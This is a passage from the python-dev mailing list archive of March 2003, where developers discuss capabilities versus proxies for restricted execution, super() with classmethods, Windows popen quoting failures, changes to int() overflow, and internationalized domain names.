> tokens that correspond to proxies, and security checkers that allow you 
> to proceed if you have the appropriate token - in other words, 
> capabilities, but very hard to use).
> 
> So, it seems to me, its simpler and more powerful to start with 
> capabilities and build proxies on top of them (or whatever alternate 
> scheme you want to build).
> 
> Once more, my apologies for not just getting straight to the point.
> 
> BTW, if you would like to explain why you don't think bound methods are 
> the way to go on python-dev, I'd love to hear it.

It seems to e a matter of convenience.  Often objects have many
methods to which you want to provide access as a group.  E.g. I might
have a service configuration registry object.  The object behaves
roughly like a dictionary.  A certain user may be given read-only
access to the registry.  Using capabilities, I would have to hand her
a bunch of capabilities for various methods: __getitem__, has_key,
get, keys, items, values, and many more.  Using proxies I can simply
give her a read-only proxy for the object.  So proxies are more
powerful.

Before you start saying that we should use capabilities as the more
fundamental mechanism and build proxies on top of that: as you point
out, we already have an equivalent more fundamental mechanism, bound
methods, which is equivalent to capabilities.  It's just that raw
capabilities aren't very usable, so one way or another we've got to
build something on top of that.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Fri Mar  7 19:42:12 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 07 Mar 2003 14:42:12 -0500
Subject: [Python-Dev] super() bug (?)
In-Reply-To: "Your message of Thu, 06 Mar 2003 18:21:40 +0100."
 <009e01c2e404$da3677c0$6d94fea9@newmexico>
References: <009e01c2e404$da3677c0$6d94fea9@newmexico>
Message-ID: <200303071942.h27JgCq23992@pcp02138704pcs.reston01.va.comcast.net>

[Samuele]
> >>> class C(object):
> ...  def f(self): pass
> ...
> >>> class D(C): pass
> ...
> >>> D.f
> <unbound method D.f>
> >>> super(D,D).f
> <bound method D.f of <class '__main__.D'>>
> 
> I think this should produce the same thing as D.f,

Really?  It makes no sense either way though.  super(D, D) only makes
sense from inside a class method; there the first argument should be
the current class and the second should be the cls argument to the
class method, e.g.:

  class C(object):
    def cm(cls): pass
    cm = classmethod(cm)

  class D(C):
    def cm(cls):
      super(D, cls).cm() # ~Same as C.cm(cls)

And this works.

I should also mention that super() should really only be used to call
a method with the same name as the currently called method -- I see
no use case for using super() with another method.

> that means implementation-wise
> 
> f.__get__(None,D) should be called
> 
> not f.__get__(D,D).
> 
> _.__get__(None,D) would still do the right thing for static AND class methods:
> 
> >>> def g(cls): pass
> ...
> >>> classmethod(g).__get__(None,D)
> <bound method type.g of <class '__main__.D'>>

It shouldn't be terribly hard to detect this situation and fix it
(somewhere in super_init()) but unless you have a use case I'd
rather consider this as a "don't care" situation.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From pedronis@bluewin.ch  Fri Mar  7 19:47:18 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Fri, 7 Mar 2003 20:47:18 +0100
Subject: [Python-Dev] super() bug (?)
References: <009e01c2e404$da3677c0$6d94fea9@newmexico> <200303071942.h27JgCq23992@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <02d701c2e4e2$5d214b00$6d94fea9@newmexico>

From: "Guido van Rossum" <guido@python.org>
> [Samuele]
> > >>> class C(object):
> > ...  def f(self): pass
> > ...
> > >>> class D(C): pass
> > ...
> > >>> D.f
> > <unbound method D.f>
> > >>> super(D,D).f
> > <bound method D.f of <class '__main__.D'>>
> >
> > I think this should produce the same thing as D.f,
>
> Really?  It makes no sense either way though.

It was sloppy phrased, super(D,D).f should return the same value as C.f, that
means an unbound method like D.f.

> super(D, D) only makes
> sense from inside a class method; there the first argument should be
> the current class and the second should be the cls argument to the
> class method, e.g.:
>
>   class C(object):
>     def cm(cls): pass
>     cm = classmethod(cm)
>
>   class D(C):
>     def cm(cls):
>       super(D, cls).cm() # ~Same as C.cm(cls)

you mean C.cm()


> And this works.
>
> I should also mention that super() should really only be used to call
> a method with the same name as the currently called method -- I see
> no use case for using super() with another method.

>
> It shouldn't be terribly hard to detect this situation and fix it
> (somewhere in super_init()) but unless you have a use case I'd
> rather consider this as a "don't care" situation.
>

no, but passing D,D even to classmethods __get__ is working but conceptually
bogus,

btw the clarifying example Python impl for super semantics at

http://www.python.org/2.2.2/descrintro.html#cooperation

is broken wrt to classmethods.


From tim.one@comcast.net  Fri Mar  7 21:03:36 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 07 Mar 2003 16:03:36 -0500
Subject: [Python-Dev] test_popen broken on Win2K
Message-ID: <BIEJKCLHCIOIHAGOKOLHAELHFBAA.tim.one@comcast.net>

Someone changed test_popen to "quote" the path to python:

    cmd = '"%s" -c "import sys;print sys.argv" %s' % (sys.executable,
cmdline)
           ^  ^

The double-quote characters above the carets are new.

This causes test_popen to fail on Win2K, but not on Win98.  The relevant
difference appears to be the default shell (cmd.exe on the former,
command.com on the latter).

Simplifed example, on Win2K:

>>> p = os.popen('python -c "print 666"')
>>> p.read()
'666\n'
>>> p.close()
>>>

Worked fine, but doesn't if python is quoted:

>>> p = os.popen('"python" -c "print 666"')
>>> p.read()
''
>>> p.close()
1
>>>

The same kind of behavior can be observed directly from a DOS-box prompt:

C:\Code\python\PCbuild>cmd /c python -c "print 666"
666

C:\Code\python\PCbuild>

Worked fine, but quoting the program name flops:

C:\Code\python\PCbuild>cmd /c "python" -c "print 666"
'python" -c "print' is not recognized as an internal or external command,
operable program or batch file.

C:\Code\python\PCbuild>

So it looks like it stripped off the first and last double-quote characters,
leaving two senseless double-quote characters "in the middle".

>From the docs for cmd.exe:

"""
If /C or /K is specified, then the remainder of the command line after
the switch is processed as a command line, where the following logic is
used to process quote (") characters:

    1.  If all of the following conditions are met, then quote characters
        on the command line are preserved:

        - no /S switch
        - exactly two quote characters
        - no special characters between the two quote characters,
          where special is one of: &<>()@^|
        - there are one or more whitespace characters between the
          the two quote characters
        - the string between the two quote characters is the name
          of an executable file.

    2.  Otherwise, old behavior is to see if the first character is
        a quote character and if so, strip the leading character and
        remove the last quote character on the command line, preserving
        any text after the last quote character.
"""

We're apparently in case #2, if for no other reason then for that there
aren't "exactly two quote characters".

I'll check in a hack to worm around this in the test, but anyone who can do
better, please do (I won't have access to a Win2K box next week).


From nas@python.ca  Fri Mar  7 21:21:18 2003
From: nas@python.ca (Neil Schemenauer)
Date: Fri, 7 Mar 2003 13:21:18 -0800
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHAELHFBAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHAELHFBAA.tim.one@comcast.net>
Message-ID: <20030307212117.GG13770@glacier.arctrix.com>

Tim Peters wrote:
> Someone changed test_popen to "quote" the path to python:
> 
>     cmd = '"%s" -c "import sys;print sys.argv" %s' % (sys.executable,
> cmdline)
>            ^  ^
> 
> The double-quote characters above the carets are new.

Having to quote arguments to popen and system is a pet peave of mine.
99% of the time I don't not want or need the shell.  Is it possible to
write versions of system() and popen() that do not use the shell on
Windows?  I know it's possible on Unix systems.  It would be really nice
if both popen() and system() could take a sequence for the command and
arguments in addition to a string.

  Neil


From theller@python.net  Fri Mar  7 21:48:29 2003
From: theller@python.net (Thomas Heller)
Date: 07 Mar 2003 22:48:29 +0100
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHAELHFBAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHAELHFBAA.tim.one@comcast.net>
Message-ID: <d6l2alw2.fsf@python.net>

Tim Peters <tim.one@comcast.net> writes:

> Someone changed test_popen to "quote" the path to python:
> 
>     cmd = '"%s" -c "import sys;print sys.argv" %s' % (sys.executable,
> cmdline)
>            ^  ^
> 
> The double-quote characters above the carets are new.
> 
> This causes test_popen to fail on Win2K, but not on Win98.  The relevant
> difference appears to be the default shell (cmd.exe on the former,
> command.com on the latter).

In distutils we had a similar problem. I don't remember the details
at the moment exactly, but I think enclosing sys.executable in double
quotes *only* when it contains spaces should do the trick.

Thomas


From tim.one@comcast.net  Fri Mar  7 22:02:23 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 07 Mar 2003 17:02:23 -0500
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <d6l2alw2.fsf@python.net>
Message-ID: <BIEJKCLHCIOIHAGOKOLHCEMDFBAA.tim.one@comcast.net>

[Thomas Heller]
> ...
> In distutils we had a similar problem. I don't remember the details
> at the moment exactly, but I think enclosing sys.executable in double
> quotes *only* when it contains spaces should do the trick.

That's what I checked in, but doubt it works in general.  The cmdline
test_popen passes to cmd.exe would have 4 double-quote characters then, and
the docs I quoted clearly say it falls into the second case then (so it
would strip the first and last quotes, leaving the second and third, which
don't make sense anymore).  The trick would work if the executable path were
the only quoted thing on the cmdline.


From tim.one@comcast.net  Fri Mar  7 22:16:21 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 07 Mar 2003 17:16:21 -0500
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <20030307212117.GG13770@glacier.arctrix.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHAEMGFBAA.tim.one@comcast.net>

[Neil Schemenauer]
> Having to quote arguments to popen and system is a pet peave of mine.
> 99% of the time I don't not want or need the shell.  Is it possible to
> write versions of system() and popen() that do not use the shell on
> Windows?  I know it's possible on Unix systems.  It would be really nice
> if both popen() and system() could take a sequence for the command and
> arguments in addition to a string.

Those would be quite different functions, then, unless you proposed to have
Python interpret native shell metacharacters on its own too (e.g., set up
pipes, do the indicated file redirections, interpolate envars, and fake
whatever other shell gimmicks people may use).

The spawn family of functions take a list of arguments and are sometimes
more convenient.  IIRC, though, on Windows the MS spawn implementation
pastes them back into a cmdline, and then you get some *really* bizarre
quoting problems.

I always thought Tcl's "exec" cmd was worthy of stealing.  That defines a
sh-like syntax for specifying OS commands, but arranges to interpret them
the same way on all platforms (so, e.g, "2>&1" redirects stderr to stdout
even on Win95; last I looked, there were thousands of lines in the Tcl
implementation devoted to making this command work).


From altis@semi-retired.com  Fri Mar  7 22:31:21 2003
From: altis@semi-retired.com (Kevin Altis)
Date: Fri, 7 Mar 2003 14:31:21 -0800
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <d6l2alw2.fsf@python.net>
Message-ID: <KJEOLDOPMIDKCMJDCNDPAEBDDBAA.altis@semi-retired.com>

> From: Thomas Heller
>
> Tim Peters <tim.one@comcast.net> writes:
>
> > Someone changed test_popen to "quote" the path to python:
> >
> >     cmd = '"%s" -c "import sys;print sys.argv" %s' % (sys.executable,
> > cmdline)
> >            ^  ^
> >
> > The double-quote characters above the carets are new.
> >
> > This causes test_popen to fail on Win2K, but not on Win98.  The relevant
> > difference appears to be the default shell (cmd.exe on the former,
> > command.com on the latter).
>
> In distutils we had a similar problem. I don't remember the details
> at the moment exactly, but I think enclosing sys.executable in double
> quotes *only* when it contains spaces should do the trick.

My example isn't for popen, but this sounds familiar. There are a few places
where I had to do things like this for some Win98 folks that installed
'Python22' into 'C:\Program Files\' instead of at 'C:\'

        if ' ' in sys.executable:
            python = '"' + sys.executable + '"'
        else:
            python = sys.executable
        os.spawnv(os.P_NOWAIT, python, [python, filename])

there have also been some quote issues with the arguments like filename and
I'm still not sure all the cases on various versions of Windows, Mac OS X,
and Linux work correctly all the time.

David Ascher is on vacation, otherwise he could tell us all about the
process.py module and how it relates to these issues :)

ka


From dave@boost-consulting.com  Sat Mar  8 02:04:42 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Fri, 07 Mar 2003 21:04:42 -0500
Subject: [Python-Dev] [2.3a2+] Change in int() behavior
Message-ID: <u1y1isjet.fsf@boost-consulting.com>

The following change in behavior is causing one of my tests to fail.
Is it intentional?  Should isinstance(int(x),int) really ever return
False?


$ python
Python 2.2.2 (#1, Feb  3 2003, 14:10:37)
[GCC 3.2 20020927 (prerelease)] on cygwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
>>> int(sys.maxint * 2)
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
OverflowError: long int too large to convert to int
>>> exit
'Use Ctrl-D (i.e. EOF) to exit.'
>>>

dave@penguin ~
$ /usr/local/pydebug/bin/python
Python 2.3a2+ (#1, Feb 24 2003, 15:02:10)
[GCC 3.2 20020927 (prerelease)] on cygwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
[17514 refs]
>>> int(sys.maxint * 2)
4294967294L
[17613 refs]
>>>
-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From tim.one@comcast.net  Sat Mar  8 04:06:53 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 07 Mar 2003 23:06:53 -0500
Subject: [Python-Dev] [2.3a2+] Change in int() behavior
In-Reply-To: <u1y1isjet.fsf@boost-consulting.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOELAEAAB.tim.one@comcast.net>

[David Abrahams]
> The following change in behavior is causing one of my tests to fail.

Dear Lord, another buggy test <wink>.

> Is it intentional?

Yes, as part of the ongoing push toward int/long unification.  If you tried
the same test in Python 2.1, it would have blown up in the "sys.maxint * 2"
part.  In 2.2, it blows up in the "int()" part.  In 2.3, it doesn't blow up
at all.  In 2.4 or 2.5, __builtin__.int and __builtin__.long may well be the
same object.

> Should isinstance(int(x),int) really ever return False?

In 2.3, yes (albeit unfortunately).

> Python 2.2.2 (#1, Feb  3 2003, 14:10:37)
> >>> int(sys.maxint * 2)
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
> OverflowError: long int too large to convert to int

> Python 2.3a2+ (#1, Feb 24 2003, 15:02:10)
> >>> int(sys.maxint * 2)
> 4294967294L

Adding one more:

Python 2.1.3 (#35, Apr  8 2002, 17:47:50) [MSC 32 bit (Intel)] on win32
>>> int(sys.maxint * 2)
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
OverflowError: integer multiplication


From dave@boost-consulting.com  Sat Mar  8 05:27:07 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sat, 08 Mar 2003 00:27:07 -0500
Subject: [Python-Dev] [2.3a2+] Change in int() behavior
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOELAEAAB.tim.one@comcast.net> (Tim
 Peters's message of "Fri, 07 Mar 2003 23:06:53 -0500")
References: <LNBBLJKPBEHFEDALKOLCOELAEAAB.tim.one@comcast.net>
Message-ID: <uel5iqvh0.fsf@boost-consulting.com>

Tim Peters <tim.one@comcast.net> writes:

> [David Abrahams]
>> The following change in behavior is causing one of my tests to fail.
>
> Dear Lord, another buggy test <wink>.
>
>> Is it intentional?
>
> Yes, as part of the ongoing push toward int/long unification.  If you tried
> the same test in Python 2.1, it would have blown up in the "sys.maxint * 2"
> part.  In 2.2, it blows up in the "int()" part.  In 2.3, it doesn't blow up
> at all.  In 2.4 or 2.5, __builtin__.int and __builtin__.long may well be the
> same object.

Yes, but in the meantime, PyInt_AS_LONG( invoke_int_conversion(x) )
might be a crash instead of raising an exception.  That's what is
causing my test to fail.  I guess I just need to lowercase a few
characters, but it's worth noting that this change breaks existing
extension module code.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From tim.one@comcast.net  Sat Mar  8 06:28:54 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sat, 08 Mar 2003 01:28:54 -0500
Subject: [Python-Dev] [2.3a2+] Change in int() behavior
In-Reply-To: <uel5iqvh0.fsf@boost-consulting.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCELIEAAB.tim.one@comcast.net>

[David Abrahams]
> Yes, but in the meantime, PyInt_AS_LONG( invoke_int_conversion(x) )
> might be a crash instead of raising an exception.

As the comment before that macro's definition says,

/* Macro, trading safety for speed */

PyInt_AsLong() won't crash, but its result needs to be checked for an error
return.

Note that your example:

    PyInt_AS_LONG( invoke_int_conversion(x) )

wasn't safe before either:  I'm not sure what invoke_int_conversion(x) means
exactly, but the plausible meanings I can think of for it *could* yield a
NULL pointer, or a pointer to a non-int object, in any version of Python
(e.g., PyNumber_Int() calls tp_as_number->nb_int but doesn't check the
return value for sanity).  In either of those cases PyInt_AS_LONG blindly
applied to the result could crash.


> That's what is causing my test to fail.  I guess I just need to lowercase
> a few characters,

You also need to check for an error return -- PyInt_AsLong() can fail.

> but it's worth noting that this change breaks existing
> extension module code.

I'm not sure it can break any I wouldn't have considered broken before.
It's normal (& expected) not to use the macro unless you *know* you've got
an int object, usually by virtue of passing a PyInt_Check() test first.


From dave@boost-consulting.com  Sat Mar  8 07:27:26 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sat, 08 Mar 2003 02:27:26 -0500
Subject: [Python-Dev] [2.3a2+] Change in int() behavior
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCELIEAAB.tim.one@comcast.net> (Tim
 Peters's message of "Sat, 08 Mar 2003 01:28:54 -0500")
References: <LNBBLJKPBEHFEDALKOLCCELIEAAB.tim.one@comcast.net>
Message-ID: <u8yvqqpwh.fsf@boost-consulting.com>

Tim Peters <tim.one@comcast.net> writes:

> [David Abrahams]
>> Yes, but in the meantime, PyInt_AS_LONG( invoke_int_conversion(x) )
>> might be a crash instead of raising an exception.
>
> As the comment before that macro's definition says,
>
> /* Macro, trading safety for speed */
>
> PyInt_AsLong() won't crash, but its result needs to be checked for an error
> return.
>
> Note that your example:
>
>     PyInt_AS_LONG( invoke_int_conversion(x) )
>
> wasn't safe before either:  I'm not sure what invoke_int_conversion(x) means
> exactly, but the plausible meanings I can think of for it *could* yield a
> NULL pointer, or a pointer to a non-int object, in any version of
> Python

Yeah, actually invoke_int_conversion basically invoked the nb_int
slot, and I _was_ doing the NULL check (don't forget, C++ has
exceptions).

> (e.g., PyNumber_Int() calls tp_as_number->nb_int but doesn't check the
> return value for sanity).  In either of those cases PyInt_AS_LONG blindly
> applied to the result could crash.
>
>
>> That's what is causing my test to fail.  I guess I just need to lowercase
>> a few characters,
>
> You also need to check for an error return -- PyInt_AsLong() can fail.

I knew that, but thanks.  I was exaggerating for effect; did it, it
works.

>> but it's worth noting that this change breaks existing
>> extension module code.
>
> I'm not sure it can break any I wouldn't have considered broken before.
> It's normal (& expected) not to use the macro unless you *know* you've got
> an int object, usually by virtue of passing a PyInt_Check() test first.

I guess I was reading
http://www.python.org/doc/current/ref/numeric-types.html#l2h-184 a
little too strongly when I wrote the code:

    __complex__(self) 

    __int__(self) 

    __long__(self) 

    __float__(self) 

    Called to implement the built-in functions complex() int() long()
    and float(). Should return a value of the appropriate type.
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

That's pretty weak language, and even if it were strong I should've
known better.  Some joker would eventually add an __int__ method,
that returns, say, a Long.  I just didn't expect it to happen in the
core (for some reason).

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From newsgroups1@bitfurnace.com  Sat Mar  8 08:26:13 2003
From: newsgroups1@bitfurnace.com (Damien Morton)
Date: Sat, 8 Mar 2003 03:26:13 -0500
Subject: [Python-Dev] acceptability of asm in python code?
Message-ID: <b4c9pk$4tu$1@main.gmane.org>

In the BINARY_ADD opcode, and in most arithmetic opcodes, there is a line
that checks for overflow that looks like this:

if ((i^a) < 0 && (i^b) < 0) goto slow_add;

I got a small speedup by replacing this with a macro defined thusly:

#if defined(_MSC_VER) and defined(_M_IX86)
#define IF_OVERFLOW_GOTO(X) __asm { jo X };
#else
#define IF_OVERFLOW_GOTO(X) if ((i^a) < 0 && (i^b) < 0) goto X;
#endif

Would this case be an acceptable use of snippets of inline assembler?


From martin@v.loewis.de  Sat Mar  8 11:43:22 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: Sat, 8 Mar 2003 12:43:22 +0100
Subject: [Python-Dev] Internationalizing domain names
Message-ID: <200303081143.h28BhMTQ002892@mira.informatik.hu-berlin.de>

IETF has recently published a series of RFCs to support non-ASCII
characters in domain names. This is called IDNA, Internationalizing
domain names in applications. It works by applications converting
Unicode domain names into ASCII ones (using an ACE, ASCII compatible
encoding), which are then send to the DNS.

I have implemented this technology for Python, and would like to see
it included in Python 2.3. It consists of the following pieces:
- Tools/unicode/mkstringprep.py, which generates Lib/stringprep.py
  from the source of RFC 3454,
- Lib/encodings/punycode.py, patch 632643, implementing RFC 3492,
- Lib/encodings/idna.py, implementing both RFC 3493 (nameprep)
  and RFC 3490 (idna)
- modifications to the socket module, to accept Unicode for host
  names, and convert it using IDNA.
- various test cases

Changes to httplib, ftplib, etc are not necessary, as they just pass
the host names through to the socket calls.

I have no changes to the urllib* modules, as the work on IRIs
(internationalized resource identifiers) is still in progress. As the
result, if one puts non-ASCII into just the hostname part of an URL,
urllib will do the right thing; urllib2 will complain about the
non-ASCII characters.

Would anybody like to review these changes?

Regards,
Martin


From ben@algroup.co.uk  Sat Mar  8 12:27:40 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Sat, 08 Mar 2003 12:27:40 +0000
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E69E1BC.5090508@algroup.co.uk>

Guido van Rossum wrote:
> [Moving a discussion about capabilities to where it arguably belongs]
> 
> [Ben Laurie]
> 
>>The point about capabilities is that mere possession of a capability is 
>>all that is required to exercise it. If you start adding security 
>>checkers to them, then you don't have capabilities anymore. But the 
>>point is somewhat deeper that than - given capabilities, you can 
>>implement proxies without requiring any more infrastructure - you can 
>>also implement security schemes that don't really correspond to any kind 
>>of security checking at all (ok, you can probably find some convoluted 
>>way to achieve the same effect, but I'll bet it comes down to having 
>>tokens that correspond to proxies, and security checkers that allow you 
>>to proceed if you have the appropriate token - in other words, 
>>capabilities, but very hard to use).
>>
>>So, it seems to me, its simpler and more powerful to start with 
>>capabilities and build proxies on top of them (or whatever alternate 
>>scheme you want to build).
>>
>>Once more, my apologies for not just getting straight to the point.
>>
>>BTW, if you would like to explain why you don't think bound methods are 
>>the way to go on python-dev, I'd love to hear it.
> 
> 
> It seems to e a matter of convenience.  Often objects have many
> methods to which you want to provide access as a group.  E.g. I might
> have a service configuration registry object.  The object behaves
> roughly like a dictionary.  A certain user may be given read-only
> access to the registry.  Using capabilities, I would have to hand her
> a bunch of capabilities for various methods: __getitem__, has_key,
> get, keys, items, values, and many more.  Using proxies I can simply
> give her a read-only proxy for the object.  So proxies are more
> powerful.
> 
> Before you start saying that we should use capabilities as the more
> fundamental mechanism and build proxies on top of that: as you point
> out, we already have an equivalent more fundamental mechanism, bound
> methods, which is equivalent to capabilities.  It's just that raw
> capabilities aren't very usable, so one way or another we've got to
> build something on top of that.

I'm not trying to persuade you that capabilities are better than 
proxies. I'd prefer to build on them, and it seems you'd prefer to do it 
another way. That's fine with me - my goal is to make capabilities both 
possible and easily usable in Python, not to persuade everyone to use 
them (yet ;-).

Bound methods are not capabilities unless they are secured. It seems the 
correct way to do this is to use restricted execution, and perhaps some 
other tricks. What I am trying to nail down is exactly what needs doing 
to get us from where we are now to where capabilities actually work. As 
I understand it, what is needed is:

a) Fix restricted execution, which is in a state of disrepair

b) Override import, open (and other stuff? what?)

c) Wrap or replace some of the existing libraries, certify that others 
are "safe"

It looks to me like a and b are shared with proxies, and c would be 
different, by definition. Is there anything else? Am I on the wrong track?

I am going to write this all up into a document which can be used as a 
starting point for work to complete this.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From guido@python.org  Sat Mar  8 13:29:58 2003
From: guido@python.org (Guido van Rossum)
Date: Sat, 08 Mar 2003 08:29:58 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: "Your message of Sat, 08 Mar 2003 12:27:40 GMT."
 <3E69E1BC.5090508@algroup.co.uk>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
 <3E69E1BC.5090508@algroup.co.uk>
Message-ID: <200303081329.h28DTw527129@pcp02138704pcs.reston01.va.comcast.net>

> What I am trying to nail down is exactly what needs doing to get us
> from where we are now to where capabilities actually work. As I
> understand it, what is needed is:
> 
> a) Fix restricted execution, which is in a state of disrepair

Yes.

> b) Override import, open (and other stuff? what?)

Don't worry about this; it's taken care of by the rexec module; each
application will probably want to do this a little differently
(certainly Zope has its own way).

> c) Wrap or replace some of the existing libraries, certify that others 
> are "safe"

This should only be necessary for (core and 3rd party) extension
modules.  The rexec module has a framework for this.

> It looks to me like a and b are shared with proxies, and c would be 
> different, by definition. Is there anything else? Am I on the wrong track?

I don't know why you think (c) is different.

> I am going to write this all up into a document which can be used as a 
> starting point for work to complete this.

Excellent.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From pedronis@bluewin.ch  Sat Mar  8 12:50:50 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Sat, 8 Mar 2003 13:50:50 +0100
Subject: [Python-Dev] Re: Capabilities
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net> <3E69E1BC.5090508@algroup.co.uk>
Message-ID: <013201c2e571$596d5dc0$6d94fea9@newmexico>

From: "Ben Laurie" <ben@algroup.co.uk>
> Guido van Rossum wrote:
> > [Moving a discussion about capabilities to where it arguably belongs]
> >
> > [Ben Laurie]
> >
> >>The point about capabilities is that mere possession of a capability is
> >>all that is required to exercise it. If you start adding security
> >>checkers to them, then you don't have capabilities anymore. But the
> >>point is somewhat deeper that than - given capabilities, you can
> >>implement proxies without requiring any more infrastructure - you can
> >>also implement security schemes that don't really correspond to any kind
> >>of security checking at all (ok, you can probably find some convoluted
> >>way to achieve the same effect, but I'll bet it comes down to having
> >>tokens that correspond to proxies, and security checkers that allow you
> >>to proceed if you have the appropriate token - in other words,
> >>capabilities, but very hard to use).
> >>
> >>So, it seems to me, its simpler and more powerful to start with
> >>capabilities and build proxies on top of them (or whatever alternate
> >>scheme you want to build).
> >>
> >>Once more, my apologies for not just getting straight to the point.
> >>
> >>BTW, if you would like to explain why you don't think bound methods are
> >>the way to go on python-dev, I'd love to hear it.
> >
> >
> > It seems to e a matter of convenience.  Often objects have many
> > methods to which you want to provide access as a group.  E.g. I might
> > have a service configuration registry object.  The object behaves
> > roughly like a dictionary.  A certain user may be given read-only
> > access to the registry.  Using capabilities, I would have to hand her
> > a bunch of capabilities for various methods: __getitem__, has_key,
> > get, keys, items, values, and many more.  Using proxies I can simply
> > give her a read-only proxy for the object.  So proxies are more
> > powerful.
> >
> > Before you start saying that we should use capabilities as the more
> > fundamental mechanism and build proxies on top of that: as you point
> > out, we already have an equivalent more fundamental mechanism, bound
> > methods, which is equivalent to capabilities.  It's just that raw
> > capabilities aren't very usable, so one way or another we've got to
> > build something on top of that.
>
> I'm not trying to persuade you that capabilities are better than
> proxies. I'd prefer to build on them, and it seems you'd prefer to do it
> another way. That's fine with me - my goal is to make capabilities both
> possible and easily usable in Python, not to persuade everyone to use
> them (yet ;-).
>
> Bound methods are not capabilities unless they are secured. It seems the
> correct way to do this is to use restricted execution, and perhaps some
> other tricks. What I am trying to nail down is exactly what needs doing
> to get us from where we are now to where capabilities actually work. As
> I understand it, what is needed is:
>
> a) Fix restricted execution, which is in a state of disrepair
>
> b) Override import, open (and other stuff? what?)
>
> c) Wrap or replace some of the existing libraries, certify that others
> are "safe"
>
> It looks to me like a and b are shared with proxies, and c would be
> different, by definition. Is there anything else? Am I on the wrong track?

there is a difference: proxies cover indipendently much of the holes in
restricted execution ...

about restricted execution:

- the way a new frame acquires the default built-ins vs. installed resticted
bult-ins is likely correct but needs auditing;

e.g. the last problem  fixed related to this was:

http://python.org/sf/577530

- under restricted execution some operation, in particular reflective ops ought
to be prohibited, the code that implements this is scattered and/because this
operations share the same execution paths with "normal" ops;

so the first thing is enumerate all that should be prohibited, or devise an
approach to security that can work with just a minimal set of guarantees
(disabled ops and/or encapsulated objects)

These were e.g. identified "problems":

http://mail.python.org/pipermail/python-dev/2002-December/031160.html
http://mail.python.org/pipermail/python-dev/2003-January/031851.html


From jepler@unpythonic.net  Sat Mar  8 14:38:44 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Sat, 8 Mar 2003 08:38:44 -0600
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHAELHFBAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHAELHFBAA.tim.one@comcast.net>
Message-ID: <20030308143843.GB1025@unpythonic.net>

When I tackled this problem for a program of mine, I ended up making sure
that I always used the "short filename" form for the program to be
executed.  This way, there were no spaces in the filename and no need to
quote them.

However, the function I used to do this comes from win32<something>, so
test_popen can't use it.  Nor can Python fix this up for all users of
os.popen()

Jeff


From thomas@xs4all.net  Sat Mar  8 14:40:59 2003
From: thomas@xs4all.net (Thomas Wouters)
Date: Sat, 8 Mar 2003 15:40:59 +0100
Subject: [Python-Dev] Internationalizing domain names
In-Reply-To: <200303081143.h28BhMTQ002892@mira.informatik.hu-berlin.de>
References: <200303081143.h28BhMTQ002892@mira.informatik.hu-berlin.de>
Message-ID: <20030308144059.GI2112@xs4all.nl>

On Sat, Mar 08, 2003 at 12:43:22PM +0100, Martin v. L=F6wis wrote:

> Would anybody like to review these changes?

I can take a look at it, but I don't actually use IDNA, so don't consider=
 me
an authorative resource :)

--=20
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me =
spread!


From ben@algroup.co.uk  Sat Mar  8 18:09:46 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Sat, 08 Mar 2003 18:09:46 +0000
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <200303081329.h28DTw527129@pcp02138704pcs.reston01.va.comcast.net>
